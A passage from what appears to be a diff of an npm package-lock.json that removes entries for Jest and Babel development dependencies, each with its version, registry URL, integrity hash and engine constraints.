"@jest/schemas": "^29.6.0", - "ansi-styles": "^5.0.0", - "react-is": "^18.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/pretty-format/node_modules/ansi-styles": { - "version": "5.2.0", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-5.2.0.tgz", - "integrity": "sha512-Cxwpt2SfTzTtXcfOlzGEee8O+c+MmUgGrNiBcXnuWxuFJHe6a5Hz7qwhwe5OgaSYI0IJvkLqWX1ASG+cJOkEiA==", - "dev": true, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/chalk/ansi-styles?sponsor=1" - } - }, - "node_modules/prompts": { - "version": "2.4.2", - "resolved": "https://registry.npmjs.org/prompts/-/prompts-2.4.2.tgz", - "integrity": "sha512-NxNv/kLguCA7p3jE8oL2aEBsrJWgAakBpgmgK6lpPWV+WuOmY6r2/zbAVnP+T8bQlA0nzHXSJSJW0Hq7ylaD2Q==", - "dev": true, - "dependencies": { - "kleur": "^3.0.3", - "sisteransi": "^1.0.5" - }, - "engines": { - "node": ">= 6" - } - }, - "node_modules/pure-rand": { - "version": "6.0.2", - "resolved": "https://registry.npmjs.org/pure-rand/-/pure-rand-6.0.2.tgz", - "integrity": "sha512-6Yg0ekpKICSjPswYOuC5sku/TSWaRYlA0qsXqJgM/d/4pLPHPuTxK7Nbf7jFKzAeedUhR8C7K9Uv63FBsSo8xQ==", - "dev": true, - "funding": [ - { - "type": "individual", - "url": "https://github.com/sponsors/dubzzz" - }, - { - "type": "opencollective", - "url": "https://opencollective.com/fast-check" - } - ] - }, - "node_modules/react-is": { - "version": "18.2.0", - "resolved": "https://registry.npmjs.org/react-is/-/react-is-18.2.0.tgz", - "integrity": "sha512-xWGDIW6x921xtzPkhiULtthJHoJvBbF3q26fzloPCK0hsvxtPVelvftw3zjbHWSkR2km9Z+4uxbDDK/6Zw9B8w==", - "dev": true - }, - "node_modules/require-directory": { - "version": "2.1.1", - "resolved": "https://registry.npmjs.org/require-directory/-/require-directory-2.1.1.tgz", - "integrity": "sha512-fGxEI7+wsG9xrvdjsrlmL22OMTTiHRwAMroiEeMgq8gzoLC/PQr7RsRDSTLUg/bZAZtF+TVIkHc6/4RIKrui+Q==", - "dev": true, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/resolve": { - "version": "1.22.2", - "resolved": "https://registry.npmjs.org/resolve/-/resolve-1.22.2.tgz", - "integrity": "sha512-Sb+mjNHOULsBv818T40qSPeRiuWLyaGMa5ewydRLFimneixmVy2zdivRl+AF6jaYPC8ERxGDmFSiqui6SfPd+g==", - "dev": true, - "dependencies": { - "is-core-module": "^2.11.0", - "path-parse": "^1.0.7", - "supports-preserve-symlinks-flag": "^1.0.0" - }, - "bin": { - "resolve": "bin/resolve" - }, - "funding": { - "url": "https://github.com/sponsors/ljharb" - } - }, - "node_modules/resolve-cwd": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/resolve-cwd/-/resolve-cwd-3.0.0.tgz", - "integrity": "sha512-OrZaX2Mb+rJCpH/6CpSqt9xFVpN++x01XnN2ie9g6P5/3xelLAkXWVADpdz1IHD/KFfEXyE6V0U01OQ3UO2rEg==", - "dev": true, - "dependencies": { - "resolve-from": "^5.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/resolve-from": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/resolve-from/-/resolve-from-5.0.0.tgz", - "integrity": "sha512-qYg9KP24dD5qka9J47d0aVky0N+b4fTU89LN9iDnjB5waksiC49rvMB0PrUJQGoTmH50XPiqOvAjDfaijGxYZw==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/resolve.exports": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/resolve.exports/-/resolve.exports-2.0.2.tgz", - "integrity": "sha512-X2UW6Nw3n/aMgDVy+0rSqgHlv39WZAlZrXCdnbyEiKm17DSqHX4MmQMaST3FbeWR5FTuRcUwYAziZajji0Y7mg==", - "dev": true, - "engines": { - "node": ">=10" - } - }, - "node_modules/semver": { - "version": "6.3.1", - "resolved": "https://registry.npmjs.org/semver/-/semver-6.3.1.tgz", - "integrity": "sha512-BR7VvDCVHO+q2xBEWskxS6DJE1qRnb7DxzUrogb71CWoSficBxYsiAGd+Kl0mmq/MprG9yArRkyrQxTO6XjMzA==", - "dev": true, - "bin": { - "semver": "bin/semver.js" - } - }, - "node_modules/shebang-command": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/shebang-command/-/shebang-command-2.0.0.tgz", - "integrity": "sha512-kHxr2zZpYtdmrN1qDjrrX/Z1rR1kG8Dx+gkpK1G4eXmvXswmcE1hTWBWYUzlraYw1/yZp6YuDY77YtvbN0dmDA==", - "dev": true, - "dependencies": { - "shebang-regex": "^3.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/shebang-regex": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/shebang-regex/-/shebang-regex-3.0.0.tgz", - "integrity": "sha512-7++dFhtcx3353uBaq8DDR4NuxBetBzC7ZQOhmTQInHEd6bSrXdiEyzCvG07Z44UYdLShWUyXt5M/yhz8ekcb1A==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/signal-exit": { - "version": "3.0.7", - "resolved": "https://registry.npmjs.org/signal-exit/-/signal-exit-3.0.7.tgz", - "integrity": "sha512-wnD2ZE+l+SPC/uoS0vXeE9L1+0wuaMqKlfz9AMUo38JsyLSBWSFcHR1Rri62LZc12vLr1gb3jl7iwQhgwpAbGQ==", - "dev": true - }, - "node_modules/sisteransi": { - "version": "1.0.5", - "resolved": "https://registry.npmjs.org/sisteransi/-/sisteransi-1.0.5.tgz", - "integrity": "sha512-bLGGlR1QxBcynn2d5YmDX4MGjlZvy2MRBDRNHLJ8VI6l6+9FUiyTFNJ0IveOSP0bcXgVDPRcfGqA0pjaqUpfVg==", - "dev": true - }, - "node_modules/slash": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/slash/-/slash-3.0.0.tgz", - "integrity": "sha512-g9Q1haeby36OSStwb4ntCGGGaKsaVSjQ68fBxoQcutl5fS1vuY18H3wSt3jFyFtrkx+Kz0V1G85A4MyAdDMi2Q==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/source-map": { - "version": "0.6.1", - "resolved": "https://registry.npmjs.org/source-map/-/source-map-0.6.1.tgz", - "integrity": "sha512-UjgapumWlbMhkBgzT7Ykc5YXUT46F0iKu8SGXq0bcwP5dz/h0Plj6enJqjz1Zbq2l5WaqYnrVbwWOWMyF3F47g==", - "dev": true, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/source-map-support": { - "version": "0.5.13", - "resolved": "https://registry.npmjs.org/source-map-support/-/source-map-support-0.5.13.tgz", - "integrity": "sha512-SHSKFHadjVA5oR4PPqhtAVdcBWwRYVd6g6cAXnIbRiIwc2EhPrTuKUBdSLvlEKyIP3GCf89fltvcZiP9MMFA1w==", - "dev": true, - "dependencies": { - "buffer-from": "^1.0.0", - "source-map": "^0.6.0" - } - }, - "node_modules/sprintf-js": { - "version": "1.0.3", - "resolved": "https://registry.npmjs.org/sprintf-js/-/sprintf-js-1.0.3.tgz", - "integrity": "sha512-D9cPgkvLlV3t3IzL0D0YLvGA9Ahk4PcvVwUbN0dSGr1aP0Nrt4AEnTUbuGvquEC0mA64Gqt1fzirlRs5ibXx8g==", - "dev": true - }, - "node_modules/stack-utils": { - "version": "2.0.6", - "resolved": "https://registry.npmjs.org/stack-utils/-/stack-utils-2.0.6.tgz", - "integrity": "sha512-XlkWvfIm6RmsWtNJx+uqtKLS8eqFbxUg0ZzLXqY0caEy9l7hruX8IpiDnjsLavoBgqCCR71TqWO8MaXYheJ3RQ==", - "dev": true, - "dependencies": { - "escape-string-regexp": "^2.0.0" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/string-length": { - "version": "4.0.2", - "resolved": "https://registry.npmjs.org/string-length/-/string-length-4.0.2.tgz", - "integrity": "sha512-+l6rNN5fYHNhZZy41RXsYptCjA2Igmq4EG7kZAYFQI1E1VTXarr6ZPXBg6eq7Y6eK4FEhY6AJlyuFIb/v/S0VQ==", - "dev": true, - "dependencies": { - "char-regex": "^1.0.2", - "strip-ansi": "^6.0.0" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/string-width": { - "version": "4.2.3", - "resolved": "https://registry.npmjs.org/string-width/-/string-width-4.2.3.tgz", - "integrity": "sha512-wKyQRQpjJ0sIp62ErSZdGsjMJWsap5oRNihHhu6G7JVO/9jIB6UyevL+tXuOqrng8j/cxKTWyWUwvSTriiZz/g==", - "dev": true, - "dependencies": { - "emoji-regex": "^8.0.0", - "is-fullwidth-code-point": "^3.0.0", - "strip-ansi": "^6.0.1" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/strip-ansi": { - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-6.0.1.tgz", - "integrity": "sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A==", - "dev": true, - "dependencies": { - "ansi-regex": "^5.0.1" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/strip-bom": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/strip-bom/-/strip-bom-4.0.0.tgz", - "integrity": "sha512-3xurFv5tEgii33Zi8Jtp55wEIILR9eh34FAW00PZf+JnSsTmV/ioewSgQl97JHvgjoRGwPShsWm+IdrxB35d0w==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/strip-final-newline": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/strip-final-newline/-/strip-final-newline-2.0.0.tgz", - "integrity": "sha512-BrpvfNAE3dcvq7ll3xVumzjKjZQ5tI1sEUIKr3Uoks0XUl45St3FlatVqef9prk4jRDzhW6WZg+3bk93y6pLjA==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/strip-json-comments": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/strip-json-comments/-/strip-json-comments-3.1.1.tgz", - "integrity": "sha512-6fPc+R4ihwqP6N/aIv2f1gMH8lOVtWQHoqC4yK6oSDVVocumAsfCqjkXnqiYMhmMwS/mEHLp7Vehlt3ql6lEig==", - "dev": true, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/supports-color": { - "version": "7.2.0", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-7.2.0.tgz", - "integrity": "sha512-qpCAvRl9stuOHveKsn7HncJRvv501qIacKzQlO/+Lwxc9+0q2wLyv4Dfvt80/DPn2pqOBsJdDiogXGR9+OvwRw==", - "dev": true, - "dependencies": { - "has-flag": "^4.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/supports-preserve-symlinks-flag": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/supports-preserve-symlinks-flag/-/supports-preserve-symlinks-flag-1.0.0.tgz", - "integrity": "sha512-ot0WnXS9fgdkgIcePe6RHNk1WA8+muPa6cSjeR3V8K27q9BB1rTE3R1p7Hv0z1ZyAc8s6Vvv8DIyWf681MAt0w==", - "dev": true, - "engines": { - "node": ">= 0.4" - }, - "funding": { - "url": "https://github.com/sponsors/ljharb" - } - }, - "node_modules/test-exclude": { - "version": "6.0.0", - "resolved": "https://registry.npmjs.org/test-exclude/-/test-exclude-6.0.0.tgz", - "integrity": "sha512-cAGWPIyOHU6zlmg88jwm7VRyXnMN7iV68OGAbYDk/Mh/xC/pzVPlQtY6ngoIH/5/tciuhGfvESU8GrHrcxD56w==", - "dev": true, - "dependencies": { - "@istanbuljs/schema": "^0.1.2", - "glob": "^7.1.4", - "minimatch": "^3.0.4" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/tmpl": { - "version": "1.0.5", - "resolved": "https://registry.npmjs.org/tmpl/-/tmpl-1.0.5.tgz", - "integrity": "sha512-3f0uOEAQwIqGuWW2MVzYg8fV/QNnc/IpuJNG837rLuczAaLVHslWHZQj4IGiEl5Hs3kkbhwL9Ab7Hrsmuj+Smw==", - "dev": true - }, - "node_modules/to-fast-properties": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/to-fast-properties/-/to-fast-properties-2.0.0.tgz", - "integrity": "sha512-/OaKK0xYrs3DmxRYqL/yDc+FxFUVYhDlXMhRmv3z915w2HF1tnN1omB354j8VUGO/hbRzyD6Y3sA7v7GS/ceog==", - "dev": true, - "engines": { - "node": ">=4" - } - }, - "node_modules/to-regex-range": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/to-regex-range/-/to-regex-range-5.0.1.tgz", - "integrity": "sha512-65P7iz6X5yEr1cwcgvQxbbIw7Uk3gOy5dIdtZ4rDveLqhrdJP+Li/Hx6tyK0NEb+2GCyneCMJiGqrADCSNk8sQ==", - "dev": true, - "dependencies": { - "is-number": "^7.0.0" - }, - "engines": { - "node": ">=8.0" - } - }, - "node_modules/type-detect": { - "version": "4.0.8", - "resolved": "https://registry.npmjs.org/type-detect/-/type-detect-4.0.8.tgz", - "integrity": "sha512-0fr/mIH1dlO+x7TlcMy+bIDqKPsw/70tVyeHW787goQjhmqaZe10uwLujubK9q9Lg6Fiho1KUKDYz0Z7k7g5/g==", - "dev": true, - "engines": { - "node": ">=4" - } - }, - "node_modules/type-fest": { - "version": "0.21.3", - "resolved": "https://registry.npmjs.org/type-fest/-/type-fest-0.21.3.tgz", - "integrity": "sha512-t0rzBq87m3fVcduHDUFhKmyyX+9eo6WQjZvf51Ea/M0Q7+T374Jp1aUiyUl0GKxp8M/OETVHSDvmkyPgvX+X2w==", - "dev": true, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/update-browserslist-db": { - "version": "1.0.11", - "resolved": "https://registry.npmjs.org/update-browserslist-db/-/update-browserslist-db-1.0.11.tgz", - "integrity": "sha512-dCwEFf0/oT85M1fHBg4F0jtLwJrutGoHSQXCh7u4o2t1drG+c0a9Flnqww6XUKSfQMPpJBRjU8d4RXB09qtvaA==", - "dev": true, - "funding": [ - { - "type": "opencollective", - "url": "https://opencollective.com/browserslist" - }, - { - "type": "tidelift", - "url": "https://tidelift.com/funding/github/npm/browserslist" - }, - { - "type": "github", - "url": "https://github.com/sponsors/ai" - } - ], - "dependencies": { - "escalade": "^3.1.1", - "picocolors": "^1.0.0" - }, - "bin": { - "update-browserslist-db": "cli.js" - }, - "peerDependencies": { - "browserslist": ">= 4.21.0" - } - }, - "node_modules/v8-to-istanbul": { - "version": "9.1.0", - "resolved": "https://registry.npmjs.org/v8-to-istanbul/-/v8-to-istanbul-9.1.0.tgz", - "integrity": "sha512-6z3GW9x8G1gd+JIIgQQQxXuiJtCXeAjp6RaPEPLv62mH3iPHPxV6W3robxtCzNErRo6ZwTmzWhsbNvjyEBKzKA==", - "dev": true, - "dependencies": { - "@jridgewell/trace-mapping": "^0.3.12", - "@types/istanbul-lib-coverage": "^2.0.1", - "convert-source-map": "^1.6.0" - }, - "engines": { - "node": ">=10.12.0" - } - }, - "node_modules/v8-to-istanbul/node_modules/convert-source-map": { - "version": "1.9.0", - "resolved": "https://registry.npmjs.org/convert-source-map/-/convert-source-map-1.9.0.tgz", - "integrity": "sha512-ASFBup0Mz1uyiIjANan1jzLQami9z1PoYSZCiiYW2FczPbenXc45FZdBZLzOT+r6+iciuEModtmCti+hjaAk0A==", - "dev": true - }, - "node_modules/walker": { - "version": "1.0.8", - "resolved": "https://registry.npmjs.org/walker/-/walker-1.0.8.tgz", - "integrity": "sha512-ts/8E8l5b7kY0vlWLewOkDXMmPdLcVV4GmOQLyxuSswIJsweeFZtAsMF7k1Nszz+TYBQrlYRmzOnr398y1JemQ==", - "dev": true, - "dependencies": { - "makeerror": "1.0.12" - } - }, - "node_modules/which": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/which/-/which-2.0.2.tgz", - "integrity": "sha512-BLI3Tl1TW3Pvl70l3yq3Y64i+awpwXqsGBYWkkqMtnbXgrMD+yj7rhW0kuEDxzJaYXGjEW5ogapKNMEKNMjibA==", - "dev": true, - "dependencies": { - "isexe": "^2.0.0" - }, - "bin": { - "node-which": "bin/node-which" - }, - "engines": { - "node": ">= 8" - } - }, - "node_modules/wrap-ansi": { - "version": "7.0.0", - "resolved": "https://registry.npmjs.org/wrap-ansi/-/wrap-ansi-7.0.0.tgz", - "integrity": "sha512-YVGIj2kamLSTxw6NsZjoBxfSwsn0ycdesmc4p+Q21c5zPuZ1pl+NfxVdxPtdHvmNVOQ6XSYG4AUtyt/Fi7D16Q==", - "dev": true, - "dependencies": { - "ansi-styles": "^4.0.0", - "string-width": "^4.1.0", - "strip-ansi": "^6.0.0" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/chalk/wrap-ansi?sponsor=1" - } - }, - "node_modules/wrappy": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/wrappy/-/wrappy-1.0.2.tgz", - "integrity": "sha512-l4Sp/DRseor9wL6EvV2+TuQn63dMkPjZ/sp9XkghTEbV9KlPS1xUsZ3u7/IQO4wxtcFB4bgpQPRcR3QCvezPcQ==", - "dev": true - }, - "node_modules/write-file-atomic": { - "version": "4.0.2", - "resolved": "https://registry.npmjs.org/write-file-atomic/-/write-file-atomic-4.0.2.tgz", - "integrity": "sha512-7KxauUdBmSdWnmpaGFg+ppNjKF8uNLry8LyzjauQDOVONfFLNKrKvQOxZ/VuTIcS/gge/YNahf5RIIQWTSarlg==", - "dev": true, - "dependencies": { - "imurmurhash": "^0.1.4", - "signal-exit": "^3.0.7" - }, - "engines": { - "node": "^12.13.0 || ^14.15.0 || >=16.0.0" - } - }, - "node_modules/y18n": { - "version": "5.0.8", - "resolved": "https://registry.npmjs.org/y18n/-/y18n-5.0.8.tgz", - "integrity": "sha512-0pfFzegeDWJHJIAmTLRP2DwHjdF5s7jo9tuztdQxAhINCdvS+3nGINqPd00AphqJR/0LhANUS6/+7SCb98YOfA==", - "dev": true, - "engines": { - "node": ">=10" - } - }, - "node_modules/yallist": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/yallist/-/yallist-3.1.1.tgz", - "integrity": "sha512-a4UGQaWPH59mOXUYnAG2ewncQS4i4F43Tv3JoAM+s2VDAmS9NsK8GpDMLrCHPksFT7h3K6TOoUNn2pb7RoXx4g==", - "dev": true - }, - "node_modules/yargs": { - "version": "17.7.2", - "resolved": "https://registry.npmjs.org/yargs/-/yargs-17.7.2.tgz", - "integrity": "sha512-7dSzzRQ++CKnNI/krKnYRV7JKKPUXMEh61soaHKg9mrWEhzFWhFnxPxGl+69cD1Ou63C13NUPCnmIcrvqCuM6w==", - "dev": true, - "dependencies": { - "cliui": "^8.0.1", - "escalade": "^3.1.1", - "get-caller-file": "^2.0.5", - "require-directory": "^2.1.1", - "string-width": "^4.2.3", - "y18n": "^5.0.5", - "yargs-parser": "^21.1.1" - }, - "engines": { - "node": ">=12" - } - }, - "node_modules/yargs-parser": { - "version": "21.1.1", - "resolved": "https://registry.npmjs.org/yargs-parser/-/yargs-parser-21.1.1.tgz", - "integrity": "sha512-tVpsJW7DdjecAiFpbIB1e3qxIQsE6NoPc5/eTdrbbIC4h0LVsWhnoa3g+m2HclBIujHzsxZ4VJVA+GUuc2/LBw==", - "dev": true, - "engines": { - "node": ">=12" - } - }, - "node_modules/yocto-queue": { - "version": "0.1.0", - "resolved": "https://registry.npmjs.org/yocto-queue/-/yocto-queue-0.1.0.tgz", - "integrity": "sha512-rVksvsnNCdJ/ohGc6xgPwyN8eheCxsiLM8mxuE/t/mOVqJewPuO1miLpTHQiRgTKCLexL4MeAFVagts7HmNZ2Q==", - "dev": true, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - } - }, - "dependencies": { - "@ampproject/remapping": { - "version": "2.2.1", - "resolved": "https://registry.npmjs.org/@ampproject/remapping/-/remapping-2.2.1.tgz", - "integrity": "sha512-lFMjJTrFL3j7L9yBxwYfCq2k6qqwHyzuUl/XBnif78PWTJYyL/dfowQHWE3sp6U6ZzqWiiIZnpTMO96zhkjwtg==", - "dev": true, - "requires": { - "@jridgewell/gen-mapping": "^0.3.0", - "@jridgewell/trace-mapping": "^0.3.9" - } - }, - "@babel/code-frame": { - "version": "7.22.13", - "resolved": "https://registry.npmjs.org/@babel/code-frame/-/code-frame-7.22.13.tgz", - "integrity": "sha512-XktuhWlJ5g+3TJXc5upd9Ks1HutSArik6jf2eAjYFyIOf4ej3RN+184cZbzDvbPnuTJIUhPKKJE3cIsYTiAT3w==", - "dev": true, - "requires": { - "@babel/highlight": "^7.22.13", - "chalk": "^2.4.2" - }, - "dependencies": { - "ansi-styles": { - "version": "3.2.1", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-3.2.1.tgz", - "integrity": "sha512-VT0ZI6kZRdTh8YyJw3SMbYm/u+NqfsAxEpWO0Pf9sq8/e94WxxOpPKx9FR1FlyCtOVDNOQ+8ntlqFxiRc+r5qA==", - "dev": true, - "requires": { - "color-convert": "^1.9.0" - } - }, - "chalk": { - "version": "2.4.2", - "resolved": "https://registry.npmjs.org/chalk/-/chalk-2.4.2.tgz", - "integrity": "sha512-Mti+f9lpJNcwF4tWV8/OrTTtF1gZi+f8FqlyAdouralcFWFQWF2+NgCHShjkCb+IFBLq9buZwE1xckQU4peSuQ==", - "dev": true, - "requires": { - "ansi-styles": "^3.2.1", - "escape-string-regexp": "^1.0.5", - "supports-color": "^5.3.0" - } - }, - "color-convert": { - "version": "1.9.3", - "resolved": "https://registry.npmjs.org/color-convert/-/color-convert-1.9.3.tgz", - "integrity": "sha512-QfAUtd+vFdAtFQcC8CCyYt1fYWxSqAiK2cSD6zDB8N3cpsEBAvRxp9zOGg6G/SHHJYAT88/az/IuDGALsNVbGg==", - "dev": true, - "requires": { - "color-name": "1.1.3" - } - }, - "color-name": { - "version": "1.1.3", - "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.3.tgz", - "integrity": "sha512-72fSenhMw2HZMTVHeCA9KCmpEIbzWiQsjN+BHcBbS9vr1mtt+vJjPdksIBNUmKAW8TFUDPJK5SUU3QhE9NEXDw==", - "dev": true - }, - "escape-string-regexp": { - "version": "1.0.5", - "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-1.0.5.tgz", - "integrity": "sha512-vbRorB5FUQWvla16U8R/qgaFIya2qGzwDrNmCZuYKrbdSUMG6I1ZCGQRefkRVhuOkIGVne7BQ35DSfo1qvJqFg==", - "dev": true - }, - "has-flag": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/has-flag/-/has-flag-3.0.0.tgz", - "integrity": "sha512-sKJf1+ceQBr4SMkvQnBDNDtf4TXpVhVGateu0t918bl30FnbE2m4vNLX+VWe/dpjlb+HugGYzW7uQXH98HPEYw==", - "dev": true - }, - "supports-color": { - "version": "5.5.0", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-5.5.0.tgz", - "integrity": "sha512-QjVjwdXIt408MIiAqCX4oUKsgU2EqAGzs2Ppkm4aQYbjm+ZEWEcW4SfFNTr4uMNZma0ey4f5lgLrkB0aX0QMow==", - "dev": true, - "requires": { - "has-flag": "^3.0.0" - } - } - } - }, - "@babel/compat-data": { - "version": "7.22.6", - "resolved": "https://registry.npmjs.org/@babel/compat-data/-/compat-data-7.22.6.tgz", - "integrity": "sha512-29tfsWTq2Ftu7MXmimyC0C5FDZv5DYxOZkh3XD3+QW4V/BYuv/LyEsjj3c0hqedEaDt6DBfDvexMKU8YevdqFg==", - "dev": true - }, - "@babel/core": { - "version": "7.22.8", - "resolved": "https://registry.npmjs.org/@babel/core/-/core-7.22.8.tgz", - "integrity": "sha512-75+KxFB4CZqYRXjx4NlR4J7yGvKumBuZTmV4NV6v09dVXXkuYVYLT68N6HCzLvfJ+fWCxQsntNzKwwIXL4bHnw==", - "dev": true, - "requires": { - "@ampproject/remapping": "^2.2.0", - "@babel/code-frame": "^7.22.5", - "@babel/generator": "^7.22.7", - "@babel/helper-compilation-targets": "^7.22.6", - "@babel/helper-module-transforms": "^7.22.5", - "@babel/helpers": "^7.22.6", - "@babel/parser": "^7.22.7", - "@babel/template": "^7.22.5", - "@babel/traverse": "^7.22.8", - "@babel/types": "^7.22.5", - "@nicolo-ribaudo/semver-v6": "^6.3.3", - "convert-source-map": "^1.7.0", - "debug": "^4.1.0", - "gensync": "^1.0.0-beta.2", - "json5": "^2.2.2" - }, - "dependencies": { - "convert-source-map": { - "version": "1.9.0", - "resolved": "https://registry.npmjs.org/convert-source-map/-/convert-source-map-1.9.0.tgz", - "integrity": "sha512-ASFBup0Mz1uyiIjANan1jzLQami9z1PoYSZCiiYW2FczPbenXc45FZdBZLzOT+r6+iciuEModtmCti+hjaAk0A==", - "dev": true - } - } - }, - "@babel/generator": { - "version": "7.23.0", - "resolved": "https://registry.npmjs.org/@babel/generator/-/generator-7.23.0.tgz", - "integrity": "sha512-lN85QRR+5IbYrMWM6Y4pE/noaQtg4pNiqeNGX60eqOfo6gtEj6uw/JagelB8vVztSd7R6M5n1+PQkDbHbBRU4g==", - "dev": true, - "requires": { - "@babel/types": "^7.23.0", - "@jridgewell/gen-mapping": "^0.3.2", - "@jridgewell/trace-mapping": "^0.3.17", - "jsesc": "^2.5.1" - } - }, - "@babel/helper-compilation-targets": { - "version": "7.22.6", - "resolved": "https://registry.npmjs.org/@babel/helper-compilation-targets/-/helper-compilation-targets-7.22.6.tgz", - "integrity": "sha512-534sYEqWD9VfUm3IPn2SLcH4Q3P86XL+QvqdC7ZsFrzyyPF3T4XGiVghF6PTYNdWg6pXuoqXxNQAhbYeEInTzA==", - "dev": true, - "requires": { - "@babel/compat-data": "^7.22.6", - "@babel/helper-validator-option": "^7.22.5", - "@nicolo-ribaudo/semver-v6": "^6.3.3", - "browserslist": "^4.21.9", - "lru-cache": "^5.1.1" - } - }, - "@babel/helper-environment-visitor": { - "version": "7.22.20", - "resolved": "https://registry.npmjs.org/@babel/helper-environment-visitor/-/helper-environment-visitor-7.22.20.tgz", - "integrity": "sha512-zfedSIzFhat/gFhWfHtgWvlec0nqB9YEIVrpuwjruLlXfUSnA8cJB0miHKwqDnQ7d32aKo2xt88/xZptwxbfhA==", - "dev": true - }, - "@babel/helper-function-name": { - "version": "7.23.0", - "resolved": "https://registry.npmjs.org/@babel/helper-function-name/-/helper-function-name-7.23.0.tgz", - "integrity": "sha512-OErEqsrxjZTJciZ4Oo+eoZqeW9UIiOcuYKRJA4ZAgV9myA+pOXhhmpfNCKjEH/auVfEYVFJ6y1Tc4r0eIApqiw==", - "dev": true, - "requires": { - "@babel/template": "^7.22.15", - "@babel/types": "^7.23.0" - } - }, - "@babel/helper-hoist-variables": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-hoist-variables/-/helper-hoist-variables-7.22.5.tgz", - "integrity": "sha512-wGjk9QZVzvknA6yKIUURb8zY3grXCcOZt+/7Wcy8O2uctxhplmUPkOdlgoNhmdVee2c92JXbf1xpMtVNbfoxRw==", - "dev": true, - "requires": { - "@babel/types": "^7.22.5" - } - }, - "@babel/helper-module-imports": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-module-imports/-/helper-module-imports-7.22.5.tgz", - "integrity": "sha512-8Dl6+HD/cKifutF5qGd/8ZJi84QeAKh+CEe1sBzz8UayBBGg1dAIJrdHOcOM5b2MpzWL2yuotJTtGjETq0qjXg==", - "dev": true, - "requires": { - "@babel/types": "^7.22.5" - } - }, - "@babel/helper-module-transforms": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-module-transforms/-/helper-module-transforms-7.22.5.tgz", - "integrity": "sha512-+hGKDt/Ze8GFExiVHno/2dvG5IdstpzCq0y4Qc9OJ25D4q3pKfiIP/4Vp3/JvhDkLKsDK2api3q3fpIgiIF5bw==", - "dev": true, - "requires": { - "@babel/helper-environment-visitor": "^7.22.5", - "@babel/helper-module-imports": "^7.22.5", - "@babel/helper-simple-access": "^7.22.5", - "@babel/helper-split-export-declaration": "^7.22.5", - "@babel/helper-validator-identifier": "^7.22.5", - "@babel/template": "^7.22.5", - "@babel/traverse": "^7.22.5", - "@babel/types": "^7.22.5" - } - }, - "@babel/helper-plugin-utils": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-plugin-utils/-/helper-plugin-utils-7.22.5.tgz", - "integrity": "sha512-uLls06UVKgFG9QD4OeFYLEGteMIAa5kpTPcFL28yuCIIzsf6ZyKZMllKVOCZFhiZ5ptnwX4mtKdWCBE/uT4amg==", - "dev": true - }, - "@babel/helper-simple-access": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-simple-access/-/helper-simple-access-7.22.5.tgz", - "integrity": "sha512-n0H99E/K+Bika3++WNL17POvo4rKWZ7lZEp1Q+fStVbUi8nxPQEBOlTmCOxW/0JsS56SKKQ+ojAe2pHKJHN35w==", - "dev": true, - "requires": { - "@babel/types": "^7.22.5" - } - }, - "@babel/helper-split-export-declaration": { - "version": "7.22.6", - "resolved": "https://registry.npmjs.org/@babel/helper-split-export-declaration/-/helper-split-export-declaration-7.22.6.tgz", - "integrity": "sha512-AsUnxuLhRYsisFiaJwvp1QF+I3KjD5FOxut14q/GzovUe6orHLesW2C7d754kRm53h5gqrz6sFl6sxc4BVtE/g==", - "dev": true, - "requires": { - "@babel/types": "^7.22.5" - } - }, - "@babel/helper-string-parser": { - "version": 